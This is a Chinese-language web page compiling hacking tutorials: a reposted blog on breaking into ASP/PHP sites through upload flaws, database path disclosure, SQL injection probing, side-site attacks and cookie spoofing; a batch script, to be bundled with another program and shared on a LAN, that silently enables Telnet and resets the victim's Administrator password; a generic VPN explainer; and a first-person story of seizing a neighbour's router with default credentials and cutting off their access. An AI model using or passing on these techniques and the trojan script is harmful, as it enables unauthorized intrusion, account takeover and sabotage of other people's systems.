本文目录一览:
学习入侵网站需要什么基本知识?
我的空间 主页|模块平台博客|写新文章相册|上传照片好友|找新朋友档案|留言板jonyoo 0 | 我的消息(0/2) | 我的空间 | 百度首页 | 百度空间 | 退出 思想之路人不停的长大,路不停的伸向远方,借百度之空间记录我思想的历程,不管思想怎样,这里所记录的都是真实自我的反映.我爱这片园地,因为他是一面镜子,照我前行! 主页博客相册|个人档案 |好友 查看文章
学习网站入侵基本知识(转)2007-06-07 15:20首先介绍下什么样的站点可以入侵:必须是动态的网站,比如asp、php、jsp 这种形式的站点。后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)。
入侵介绍: 1 上传漏洞;2 暴库;3 注入;4 旁注;5 COOKIE诈骗。
1 上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。
怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL。
工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。
WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2 暴库:这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 ;ID=161,我门就可以把com/dispbbs中间的/换成%5c,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。
为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。
3 注入漏洞:这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。
怎样利用:我先介绍下怎样找漏洞比如这个网址 ;ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞,知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI NDSI 啊D DOMAIN等)都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。
4 旁注:我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。打个形象的比喻,比如你和我一个楼,我家很安全,而你家呢,却漏洞百出,现在有个贼想入侵我家,他对我家做了监视(也就是扫描)发现没有什么可以利用的东西,那么这个贼发现你家和我家一个楼,你家很容易就进去了,他可以先进入你家,然后通过你家得到整个楼的钥匙(系统权限),这样就自然得到我的钥匙了,就可以进入我的家(网站)。
工具介绍:还是名小子的DOMIAN3.5不错的东西,可以检测注入,可以旁注,还可以上传!
5 COOKIE诈骗:许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。
怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了,但是破解不出来密码(MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
今天的介绍就到这里了,比较基础,都是概念性的东西,所有的都是我的个人理解,如有不正确的地方希望大家指出(个人认为就是,为什么换成%5c,这里有点问题)。
怎么入侵局域网啊?
新建一个文本文档,内容如下:
@echo REGEDIT4 b.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr] b.reg
@echo "Start"=dword:00000002 b.reg
regedit /s /c b.reg
del b.reg
net user administrator 154861
然后,将其另存为,.bat为后缀的文件。并将其与另一程序捆绑,在局域网上共享。
接下来就是等着别人上钩。
现在分析一下上面几行内容,
前三行是建一个注册表文件,起作用是修改注册表的键值,来达到系统自动启动Telnet
的目的。00000002是自动,00000003是手动,00000004是禁止启动。
regedit /s /c b.reg是将注册表文件通过后台运行导入注册表。
最后一行是将目标的Administrator的密码修改为154861。
这里我们为什么不新建一个帐户呢?
因为:
1:现在很多人用的是WINXP,并且使用欢迎界面登陆。新建帐户一眼就看出来了。
2:很多人的Aministrator是很久都不使用的,所以这就相对安全一些。
过一段时间以后,使用Superscan扫描一下网段的23端口。开了这个端口的十之八九
就是中计了。
大家帮帮我 如何进如别人的内部网
进入别人公司的内部网有两种方法:
第一,使用黑客手段,入侵对方服务器,丛而攻破外网,而进入内网.或者进入到网中上的某台计算机里..都是可以的!
第二:使用正规手段,在对方公司内部开VPN服务!(VPN即虚拟专用网)
而现在主流的就是VPN,使用简单 并且,不需要硬件的支持...
什么是VPN?
现在有很多连接都被称作VPN,用户经常分不清楚,那么一般所说的VPN到底是什么呢?顾名思义,虚拟专用网不是真的专用网络,但却能够实现专用网络的功能。虚拟专用网指的是依靠ISP(Internet服务提供商)和其它NSP(网络服务提供商),在公用网络中建立专用的数据通信网络的技术。在虚拟专用网中,任意两个节点之间的连接并没有传统专网所需的端到端的物理链路,而是利用某种公众网的资源动态组成的。IETF草案理解基于IP的VPN为:"使用IP机制仿真出一个私有的广域网"是通过私有的隧道技术在公共数据网络上仿真一条点到点的专线技术。所谓虚拟,是指用户不再需要拥有实际的长途数据线路,而是使用Internet公众数据网络的长途数据线路。所谓专用网络,是指用户可以为自己制定一个最符合自己需求的网络。
用户现在在电信部门租用的帧中继(Frame Relay)与ATM等数据网络提供固定虚拟线路(PVC-Permanent Virtual Circuit)来连接需要通讯的单位,所有的权限掌握在别人的手中。如果用户需要一些别的服务,需要填写许多的单据,再等上相当一段时间,才能享受到新的服务。更为重要的是两端的终端设备不但价格昂贵,而且管理也需要一定的专业技术人员,无疑增加了成本,而且帧中继、ATM数据网络也不会像Internet那样,可立即与世界上任何一个使用Internet网络的单位连接。而在Internet上,VPN使用者可以控制自己与其他使用者的联系,同时支持拨号的用户。
所以我们说的虚拟专用网一般指的是建筑在Internet上能够自我管理的专用网络,而不是Frame Relay或ATM等提供虚拟固定线路(PVC)服务的网络。以IP为主要通讯协议的VPN,也可称之为IP-VPN。
由于VPN是在Internet上临时建立的安全专用虚拟网络,用户就节省了租用专线的费用,在运行的资金支出上,除了购买VPN设备,企业所付出的仅仅是向企业所在地的ISP支付一定的上网费用,也节省了长途电话费。这就是VPN价格低廉的原因。
越来越多的用户认识到,随着Internet和电子商务的蓬勃发展,经济全球化的最佳途径是发展基于Internet的商务应用。随着商务活动的日益频繁,各企业开始允许其生意伙伴、供应商也能够访问本企业的局域网,从而大大简化信息交流的途径,增加信息交换速度。这些合作和联系是动态的,并依靠网络来维持和加强,于是各企业发现,这样的信息交流不但带来了网络的复杂性,还带来了管理和安全性的问题,因为Internet是一个全球性和开放性的、基于TCP/IP 技术的、不可管理的国际互联网络,因此,基于Internet的商务活动就面临非善意的信息威胁和安全隐患。
还有一类用户,随着自身的的发展壮大与跨国化,企业的分支机构不仅越来越多,而且相互间的网络基础设施互不兼容也更为普遍。因此,用户的信息技术部门在连接分支机构方面也感到日益棘手。
用户的需求正是虚拟专用网技术诞生的直接原因。
-----------------------------
-------------------------------
---------------------------------
-------------------------------
如何抢键VPN?
怎么入侵邻居家的无线路由器实战
入侵邻居家的无线路由器实战
【路由器知识大全】
欢迎大家来到学习啦。本文讲解入侵邻居家的无线路由器实战,欢迎大家阅读借鉴。
对于一般的人来说,只顾着享受无线带来的便利,却对安全性不加重视,这就很容易被个别“有心人”趁虚而入,其实入侵无线网络并不需要很高的技术含量,只要一些简单的电脑和网络常识,而防范的方法也很简单,只是许多人贪一时方便没有去注意,且看主人公小兵的故事。
我那天下班后回家,在电梯里听着住在楼下屋的两姐妹眉飞色舞地描述着家里如何无线上网,心想,平日里这两个电脑盲居然也玩起无线,以前电脑有个三长两短总叫我去看,这次如此大事居然把我晾在一边,在电梯里当我透明的。我很生气,后果很严重,看我怎么收拾你们,保证不出今宵,这两个小MM一定会软硬兼施哀求我帮忙,想到这里不禁发出阴阴的冷笑声。
MM隔壁的黑客
心不在焉地吃完饭后,我拿着笔记本到阳台,这个位置最靠近楼下那家人的书房,如果没有估计错的话,无线路由器应该放在书房电脑旁边,在阳台信号应该最强,晚上8点钟左右,看着屋外漆黑的一片,是该动手的时候了。
笔记本开机后,在运行中输入“devmgmt.msc”开启设备管理器,在网络适配器中启动Intel Wireless/Pro 2915ABG无线模块,然后设置无线连接属性,在Internet协议属性中设置自动获得IP地址。然后在命令提示字符中输入“ipconfig /renew”,返回的结果是:
Ethernet adapter 无线网络连接: Connection-specific DNS Suffix . : domain IP Address. . . . . . . . . . . . : 192.168.1.100 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1
结果让我兴奋了一把,看来有戏了,接着输入“ipconfig /all”,看到DHCP Server参数的确是192.168.1.1,这说明我的笔记本已经接到那姐妹家的无线路由器了。
防:无线路由器默认都开启DHCP Server功能,这虽然可以方便客户端地址分配和管理,但是也让入侵者容易接入,为了安全起见可以将它停用。登录无线路由器的Web管理界面,在DHCP项目中,选择“不启用”选项,客户端采用手动指定IP地址和默认网关的方式。
验明无线路由器真身
想不到这么容易就接入无线路由器,看来这姐妹俩真的一点安全防范意识都没有,那接下来实施的是对无线路由器验明真身。
每个网络设备都有一个全球唯一的“身份证”号码,无线路由器也不例外,格式如:5254AB1D917A,在这串12位的16进制字符中,前6位用来标记特定厂商,后6位用来标记具体产品,要验明无线路由器真身,这就好办了,在命令提示字符中输入“arp -a”,看到返回的结果是:
Interface: 192.168.1.100 --- 0x2 Internet Address Physical Address Type 192.168.1.1 00-0a-eb-d5-1c-a2 dynamic
有了无线路由器的MAC地址,我便立即开启IE,到IEEE网站查这个地址是分配给哪个厂商的,于是输入,将前6位“00-0a-eb”输入至Search for一栏(图2)。在返回的网页中显示如图3所示的结果。原来该姐妹买的是TP-Link的无线路由器,离目标又近了一步。
防:每个网络设备在出厂时都烧了一个指定的MAC地址,可以从该地址辨识厂家,为了不让无线路由器让别人辨识,可随意修改成其他MAC地址。在无线路由器的Web管理界面中,展开“网络参数→MAC地址克隆”,将前6位修改为其他的(图4)。
无线路由器机密的泄露
虽然知道无线路由器的厂商是TP-Link,但是我还是无从下手,因为不知道具体的产品型号,不过无须担心,厂商在不同产品上都喜欢用相同的账号密码等参数,这就好下手了。
虽然没有TP-Link无线路由器的说明书,但是要查它的默认账号密码还是很简单的,立即到百度网站,以“TP-Link 无线路由器 默认密码”为关键词搜寻,如果不出所料,在第一屏的一个网页上会找到蛛丝马迹。
如果没有错的话,默认账号和密码都是admin,求佛主保佑姐妹俩不会改。果然,在IE地址栏中输入“192.168.1.1”,在弹出的验证画面中分别输入admin,进入无线路由器的Web管理界面。
防:为了安全起见,无线路由器在最初使用时应该立即修改默认的账号和密码,在Web管理界面,展开“系统工具→修改登录口令”,输入新用户名和口令。
如入无人之境
既然无线路由器的最高管理权限唾手可得,接下来便是如入无人之境,这时候我在考虑如何搞破坏,是将无线路由器乱设置一通?更新个不匹配的固件干掉无线路由器?还是修改上网参数让她们无法上QQ?想来想去,最后我决定点到为止,前提是不要给她们造成无法挽救的损失,但也不能让她们能够自己修复,目的是让她们要搬救兵,当然就是找小兵我啦,于是黑客行动开始了……
在Web管理界面,进入DHCP服务器的客户端列表,看到客户端一共有3个,如果没有估错的话,这3台应该就是我的笔记本和姐妹的两台电脑,复制她们两台电脑的MAC地址,然后开启无线路由器的防火墙,开启MAC地址过滤,禁止已设MAC地址列表中已启用的MAC地址访问Internet,允许其他MAC地址访问Internet。
然后在MAC地址过滤中将姐妹两台电脑的MAC地址加在上面。在系统工具中重新启动无线路由器,操作完毕后立即关闭IE,盖上笔记本屏幕,溜到客厅看电视。
防:如果无线路由器的最高权限被盗取,将很难做任何防范。
如愿以偿
大概过了10分钟之后,在9点钟时,门铃如期而响,我友善地开了门,问到访者有啥事,她说家里怎么无故上不了网,叫我下去看看,我二话没说便跟着下去了。看着姐妹俩对我这个高手大献殷勤,我便不慌不乱地在电脑上东改改西改改。其实补救很简单的,假装在电脑上瞎忙了一阵是为了扮高手,让她们误以为解决问题有难度。姐妹俩简直把我当神看待,哪知忽悠她们也只是雕虫小技,由于她们的热情好客,我连续喝了两碗甜汤,心里也甜滋滋的,时候也不早了,我提出要回去了,晚上躺在床上想起来还一直忍俊不住,睡觉还笑出声来呢。
救:其实是姐妹俩不知道上不了网是电脑故障,还是无线路由器问题,或者电信的问题,而对于我来说则知道问题所在,可以对症下药,首先关闭无线路由器,然后按机身的Reset按钮,再接上电源开启便可,无线路由器就会被还原到出厂设置,防火墙和MAC地址过滤信息将被删除,而上网账号等参数则保留。